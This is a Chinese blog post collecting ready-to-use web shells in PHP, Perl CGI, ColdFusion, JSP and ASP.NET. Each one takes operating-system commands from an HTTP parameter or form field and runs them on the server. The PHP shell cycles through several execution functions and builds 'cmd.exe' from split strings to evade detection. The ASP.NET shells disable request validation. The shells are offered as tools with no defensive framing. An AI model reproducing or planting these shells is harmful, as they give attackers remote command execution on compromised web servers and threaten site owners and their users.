cmdshell集合
- 发表于
- 周边
共有:
| 1 | <phpshell>、<perlshell cgi>、<cfm shell>、<jspshell>、<c# shell>2枚 |
下边是代码:
phpshell
---------------------------------------------------------------------------
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 | <?php if (key($_GET)=="system") { system($_GET['system']); } elseif (key($_GET)=="passthru") { passthru($_GET['passthru']); } elseif (key($_GET)=="exec") { $result = exec($_GET['exec']); echo $result; } elseif (key($_GET)=="shell_exec") { $result=shell_exec($_GET['shell_exec']); echo $result; } elseif (key($_GET)=="popen") { $pp = popen($_GET['popen'], 'r'); $read = fread($pp, 2096); echo $read; pclose($pp); } elseif (key($_GET)=="wscript") { $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed"); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; } elseif(key($_GET)=="proc_open"){ $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], "".$_GET['proc_open']."\r\n"); fwrite($pipes[0], "exit\r\n"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); while (!feof($pipes[2])) { echo fgets($pipes[2], 1024); } fclose($pipes[2]); proc_close($process); }} ?> |
--------------------------------------------------------------------------------------
perlshell cgi
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | #!/usr/bin/perl read(STDIN,$POST,$ENV{'CONTENT_LENGTH'}); ($key,$command)=split(/=/,$POST); $command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg; $command=~s/\+/ /; $output=system "$command>a.txt"; $output=~s/\n/\<br\>/; print "Content-Type: text/html\n\n"; print <<EOF; <form action="" method=POST> <input type=text size=40 name=command value=""><br> <input type=submit value=ok> </form> EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=<OUTPUT>; print <<EOF; <textarea name="textfield" cols="80" rows="60">@output</textarea> EOF close OUTPUT; unlink ("a.txt"); exit; |
--------------------------------------------------------------------------------------------------------------
cfm shell
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>CFM shell</title> </head> <body> <!--- os.run ---> <cfif IsDefined("FORM.cmd")> <cfoutput>#cmd#</cfoutput> <cfexecute name="cmd.exe" arguments="/c #cmd#" outputfile="#GetTempDirectory()#kyo.txt" timeout="1"> </cfexecute> </cfif> <form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post"> <input type=text size=45 name="cmd" > <input type=Submit value="run"> </form> <cfif FileExists("#GetTempDirectory()#kyo.txt") is "Yes"> <cffile action="Read" file="#GetTempDirectory()#kyo.txt" variable="readText"> <textarea readonly cols=80 rows=20> <CFOUTPUT>#readText#</CFOUTPUT> </textarea> <cffile action="Delete" file="#GetTempDirectory()#kyo.txt"> </cfif> </body> </html> |
--------------------------------------------------------------------------
jspshell
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | <%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %> |
----------------------------------------------------------------------------------------------
c# shell
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | <%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="Head1" runat="server"> <title>cmdshell</title></head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <script language="C#" runat="server"> void Button_Click1(object sender, EventArgs e) { try { Process shell = new Process(); shell.StartInfo.FileName = PathTextBox.Text; shell.StartInfo.Arguments = ShellTextBox.Text; shell.StartInfo.UseShellExecute = false; shell.StartInfo.RedirectStandardInput = true; shell.StartInfo.RedirectStandardOutput = true; shell.StartInfo.RedirectStandardError = true; shell.Start(); string str1 = shell.StandardOutput.ReadToEnd(); str1 = str1.Replace("<", "<"); str1 = str1.Replace(">", ">"); myLabel.Text = "<hr><b>" + str1 + "</b>"; } catch (Exception Error) { Bin_Error(Error.Message); } } </script> <body> <center><font size=5 color=red>asp.net命令执行 by kyo</font><br /></center> <form id="form1" runat="server"><div style="text-align: center"> <asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr /> 程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br /> 命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br /> <asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div> <div style="text-align: left"> <asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div> <hr /></asp:Panel></form></body> </html> |
---------------------------------------------------------------------------------------------------------
c# shell 2
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | <%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim StrResult As String Dim shell As Object shell = Server.CreateObject("WScript.Shell") StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall StrResult = Replace(StrResult , "<","<") StrResult = Replace(StrResult , ">",">") ResultLabel.Text = "<b>" & StrResult & "</b>" end sub </script> <html><head></head><body> <form runat="server"> 程序路径:<asp:TextBox ID="path" Width="500" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>命令参数:<asp:TextBox ID="box" Width="200" runat="server" /> <asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br> <asp:Label ID="ResultLabel" runat="server" /> </form></body></html> |
-----------------------------------------------------------------------------------------------------------------------
c# shell 3
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | <!-- Titel: shell.application Author: kyo327 Date: 2010-06-12 --> <%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %> <script runat="server"> sub run(Src As Object, E As EventArgs) Dim appName As String Dim appArgs As String Dim love As Object love = Server.CreateObject("Shell.Application") appName = appnames.Text appArgs = canshu.Text love.ShellExecute(appName, appArgs, "", "open", 0) end sub </script><html> <head><title>shellapplication For ASP.NET By kyo327</title></head> <body><form id="Form1" runat="server"> <center><font color=red size=4>利用shell.application执行命令for asp.net</font><br /> <br>程序路径名:<br /> <asp:TextBox ID="appnames" Width="400" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" /> <br>参数:<br /> <asp:TextBox ID="canshu" Width="400" runat="server" /> <br /><br /> <asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br> </form></center></body></html> |
原文连接:cmdshell集合 所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。 
